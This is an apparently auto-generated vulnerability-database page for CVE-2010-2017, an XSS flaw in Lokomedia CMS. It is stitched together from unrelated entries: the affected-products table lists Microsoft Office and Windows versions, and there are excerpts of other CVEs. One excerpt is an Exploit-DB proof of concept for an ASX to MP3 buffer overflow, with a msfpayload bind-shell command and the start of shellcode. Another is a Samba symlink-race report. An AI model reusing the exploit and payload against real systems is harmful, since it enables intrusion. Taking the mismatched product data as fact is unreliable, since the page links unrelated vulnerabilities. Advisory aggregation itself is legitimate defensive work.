CVE-2010-2017
published 2010-05-24CVE-2010-2017: Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML…
PriorityP413medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
1.07%
60.8th percentile
Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML via the kata parameter. NOTE: some of these details are obtained from third party information.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bukulokomedia | lokomedia_cms | — | — |
| bukulokomedia | lokomedia_cms | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_compatibility_pack_service_pack_3 | — | — |
| msrc | microsoft_office_web_apps_server_2010_service_pack_2 | — | — |
| msrc | microsoft_office_word_viewer | — | — |
| msrc | microsoft_word_2007_service_pack_3 | — | — |
| msrc | microsoft_word_2010_service_pack_2 | — | — |
| msrc | microsoft_word_for_mac_2011 | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1511 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1703 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_server_2012_r2 | — | — |
| msrc | windows_server_2016 | — | — |
| msrc | word_automation_services_on_microsoft_sharepoint_server_2010_service_pack_2 | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_msrc5.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4rvw-87w8-xp4x: Cross-site scripting (XSS) vulnerability in hasil-pencarian
ghsa_unreviewed·2022-05-17
CVE-2010-2017 [MEDIUM] CWE-79 GHSA-4rvw-87w8-xp4x: Cross-site scripting (XSS) vulnerability in hasil-pencarian
Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML via the kata parameter. NOTE: some of these details are obtained from third party information.
Microsoft
Windows Uniscribe Information Disclosure Vulnerability
vendor_msrc·2017-06-13·CVSS 4.4
CVE-2017-0285 [MEDIUM] Windows Uniscribe Information Disclosure Vulnerability
Windows Uniscribe Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.
The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.
FAQ: I am running Office 2010, which is listed as affected software. Why am I not being offered the update?
The update, 3191848 (Ogl.dll), is not applicable to Office 2010 on Windows Server 2008 a
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2017-03-14·CVSS 5.5
CVE-2017-0105 [MEDIUM] Microsoft Office Information Disclosure Vulnerability
Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3178686 update?
The 3178686 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
No detection rules found.
Exploit-DB
ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
exploitdb·2017-10-11·CVSS 7.8
CVE-2017-15221 [HIGH] ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
---
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
# Exploit Author: Parichay Rai
# Tested on: XP Service Pack 3
# CVE : CVE-2017-15221
Description
A buffer overflow Attack possible due to improper input mechanism
Proof of Concept
#!/usr/bin/python
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
#This is an exploit that work well against a windows XP3 systems!
#Successful exploit gives you a bind shell on 4444
BadChar= "\x00\x0a\x0d\x20"
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
# Successful exploitation opens port 4444 on the victim Machine
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\
Exploit-DB
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
exploitdb·2017-03-27·CVSS 3.5
CVE-2017-2619 [LOW] Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039
The Samba server is supposed to only grant access to configured share
directories unless "wide links" are enabled, in which case the server is allowed
to follow symlinks. The default (since CVE-2010-0926) is that wide links are
disabled.
smbd ensures that it isn't following symlinks by calling lstat() on every
path component, as can be seen in strace (in reaction to the request
"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):
root@debian:/home/user# strace -e trace=file -p18954
Process 18954 attached
lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
getcwd("/public", 4096) = 8
lstat("/pub
No writeups or analysis indexed.
2010-05-24
Published